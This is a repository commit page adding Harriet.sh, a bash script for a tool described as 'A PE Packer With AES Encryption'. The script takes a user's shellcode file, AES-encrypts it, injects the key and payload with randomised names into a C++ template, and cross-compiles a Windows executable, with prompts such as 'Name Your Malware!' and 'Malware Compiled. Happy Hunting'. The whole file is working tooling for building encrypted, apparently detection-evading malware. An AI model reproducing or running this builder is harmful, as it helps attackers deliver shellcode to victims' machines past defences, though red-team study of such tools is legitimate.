Forráskód Böngészése

Create Harriet.sh

assume-breach 3 éve
szülő
commit
38af8e7a02
1 módosított fájl, 77 hozzáadás és 0 törlés
  1. 77 0
      Harriett/Harriet/Harriet.sh

+ 77 - 0
Harriett/Harriet/Harriet.sh

@@ -0,0 +1,77 @@
+#!/bin/bash
+
+# Color variables
+red='\033[0;31m'
+green='\033[0;32m'
+yellow='\033[0;33m'
+blue='\033[0;34m'
+magenta='\033[0;35m'
+cyan='\033[0;36m'
+# Clear the color after that
+clear='\033[0m'
+cat << "EOF"
+  __ _ ___ ___ _   _ _ __ ___   ___      | |__  _ __ ___  __ _  ___| |__  
+ / _` / __/ __| | | | '_ ` _ \ / _ \_____| '_ \| '__/ _ \/ _` |/ __| '_ \ 
+| (_| \__ \__ \ |_| | | | | | |  __/_____| |_) | | |  __/ (_| | (__| | | |
+ \__,_|___/___/\__,_|_| |_| |_|\___|     |_.__/|_|  \___|\__,_|\___|_| |_|
+                            
+                                **Harriet**
+                                
+                       A PE Packer With AES Encryption
+               
+                   
+ 
+EOF
+echo -e ${green}"Enter A Random Word!"${clear}
+echo ""
+read Random1
+echo""
+echo -e ${green}"Enter A Random Word!"${clear}
+echo ""
+read Random2
+echo ""
+echo -e ${green}"Enter A Random Word!"${clear}
+echo ""
+read Random3
+echo ""
+echo -e ${green}"Enter The Path To Your Shellcode File. ex: /home/user/Downloads/shellcode.bin"${clear}
+echo ""
+read Shellcode
+echo ""
+echo -e ${green}"Name Your Malware! ex: malware.exe"${clear}
+echo ""
+read Random4
+echo ""
+cp ../template.cpp Resources/template.cpp
+echo -e ${yellow}"Encrypting Payload" ${clear}
+echo ""
+sleep 2
+python2 aesencrypt.py $Shellcode > shell.txt
+echo -e ${yellow}"Encryption Completed"${clear}
+echo ""
+sed -i s/Random1/$Random1/g Resources/template.cpp
+
+sed -i s/Random2/$Random2/g Resources/template.cpp
+
+sed -i s/Random3/$Random3/g Resources/template.cpp
+
+cp shell.txt shell2.txt
+
+keys=$(cat "shell2.txt")
+cut -d 'p' -f1 shell2.txt > shell3.txt
+keys=$(cat shell3.txt)
+keysnow=${keys#*=}
+sed -i "s/KEYVALUE/$keysnow/g" Resources/template.cpp
+
+payload=$(cat "shell.txt")
+payloadnow=${payload#*;}
+payloadtoday=${payloadnow#*=}
+echo $payloadtoday > shell5.txt
+perl -pe 's/PAYVAL/`cat shell5.txt`/ge' -i Resources/template.cpp
+sleep 2
+echo -e ${yellow}"Compiling Malware"${clear}
+x86_64-w64-mingw32-g++ -o $Random4 Resources/template.cpp -fpermissive -Wno-narrowing >/dev/null 2>&1
+echo ""
+sleep 2
+echo -e ${yellow}"Malware Compiled. Happy Hunting"${clear}
+rm shell*